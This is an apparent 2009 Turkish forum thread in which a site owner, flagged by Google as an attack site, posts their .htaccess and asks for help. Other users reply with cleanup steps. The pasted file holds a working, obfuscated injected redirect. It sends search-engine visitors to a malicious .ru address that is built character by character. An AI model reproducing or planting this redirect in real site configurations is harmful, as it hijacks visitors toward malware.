• 25-02-2009, 09:53:08
    #1
    Merhaba googledan siteme giremeye çalıştığımda saldırgan olarak bildirilmiş site uyarısı veriyor.r10'nu ve interneti araştırdım .htaccess te bir sorun olabileceğini öğrendim. Sizcede öylemidir? nasıl hallderim bu sorunu?

    buranın çözümüne baktım çözümü bulamadım.

    Benim .htaccess 'imin kodlarına bakarmısınız bir sorun varmı? bir sürü değişik karakter var işe yarayıp yaramadığını bilmiyorum.

    Bu kodlar normal mi?

    RewriteEngine On
    Options +FollowSymlinks
    RewriteBase /
    RewriteCond %{HTTP_REFERER} !.*google.*|.*ask.*|.*yahoo.*|.*excite.*|.*altavista.*|.*msn.*|.*netscape.*|.*yandex.*|.*rambler.*|.*ya.*|.*aol.*|.*hotbot.*|.*goto.*|.*infoseek.*|.*mamma.*|.*alltheweb.*|.*lycos.*|.*search.*|.*metacrawler.*|.*dogpile.*
    RewriteRule .* - [L]
    RewriteRule .* - [E=ic:.]
    RewriteCond %{ENV:ic} ^(.*)$
    RewriteRule .* - [E=bo:0%1]
    RewriteCond %{ENV:bo} ^(.*)$
    RewriteRule .* - [E=es:%1r]
    RewriteCond %{ENV:es} ^(.*)$
    RewriteRule .* - [E=qu:t%1]
    RewriteCond %{ENV:qu} ^(.*)$
    RewriteRule .* - [E=ki:p%1]
    RewriteCond %{ENV:ki} ^(.*)$
    RewriteRule .* - [E=qo:g%1]
    RewriteCond %{ENV:qo} ^(.*)$
    RewriteRule .* - [E=iy:/%1]
    RewriteCond %{ENV:iy} ^(.*)$
    RewriteRule .* - [E=vw:%1u]
    RewriteCond %{ENV:vw} ^(.*)$
    RewriteRule .* - [E=ji:/%1]
    RewriteCond %{ENV:ji} ^(.*)$
    RewriteRule .* - [E=qa::%1]
    RewriteCond %{ENV:qa} ^(.*)$
    RewriteRule .* - [E=qs:p%1]
    RewriteCond %{ENV:qs} ^(.*)$
    RewriteRule .* - [E=ou:t%1]
    RewriteCond %{ENV:ou} ^(.*)$
    RewriteRule .* - [E=pb:%1/]
    RewriteCond %{ENV:pb} ^(.*)$
    RewriteRule .* - [E=wq:%1i]
    RewriteCond %{ENV:wq} ^(.*)$
    RewriteRule .* - [E=lk:%1n]
    RewriteCond %{ENV:lk} ^(.*)$
    RewriteRule .* - [E=hw:t%1]
    RewriteCond %{ENV:hw} ^(.*)$
    RewriteRule .* - [E=vl:h%1]
    RewriteCond %{ENV:vl} ^(.*)$
    RewriteRule .* - [E=ku:%1.]
    RewriteCond %{ENV:ku} ^(.*)$
    RewriteRule .* - [E=af:%1c]
    RewriteCond %{ENV:af} ^(.*)$
    RewriteRule .* - [E=kg:%1g]
    RewriteCond %{ENV:kg} ^(.*)$
    RewriteRule .* - [E=qn:%1i]
    RewriteCond %{ENV:qn} ^(.*)$
    RewriteRule .* - [E=pl:%1?]
    RewriteCond %{ENV:pl} ^(.*)$
    RewriteRule .* - [E=js:%13]
    RewriteCond %{ENV:js} ^(.*)$
    RewriteRule ^(.*)$ %1 [R=301,L]
    yardımlarınızı bekliyorum.
  • 25-02-2009, 11:00:07
    #2
    bu sorunu düzeltebilmen için ilk önce sitene bulaşmış iframe virüsünü temizlemen lazım.muhtemelen index dosyasındadır.. sonra google web yöneticisi araçlarından siteni ekle ve doğrula..daha sonrada inceleme talebinde bulunursan 1-2 gün içinde normale dönecektir..Yardımcı da olurum istersen.
  • 25-02-2009, 11:16:15
    #3
    öncelikle kullandığın pcde bi virüs vardır onu bi şekilde sil, sonra cuteftp varsa kaldır, bilgisayarında cuteftp varsa kaldır, cuteftpde başka siteler varsa onlarında ftp şifresini değiştir iframe virüsü o program ile diğer sitelerede kendini kopyabiliyor daha sonra bulaşan sitende ne kadar index.php, index.html, index.htm varsa hepsini tara içlerinde iframe kodu gömülmüştür onları bul sil ozanak arkadaşımızında dediği gibi webmaster tools yeniden değerlendirme isteği gönder
  • 25-02-2009, 13:34:25
    #4
    illaki dosyalardadır diyosunuz yani? veritabanına bulaşmış olmasın?

    Önce
    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=tr&site=http://www.siteniz.com
    burada siteniz.com yazan yerlere sitenizi yazarak hangi siteler yüzünden saldırgan durumuna geldiğinizi kontrol edin.sonra bu sitelerin isimlerini veritabanında ve dosyalarınızda arayın.

    Ayrıca Stopbadware.org sitesinden de review istemeniz lazım bu işlemi bitirdikten sonra.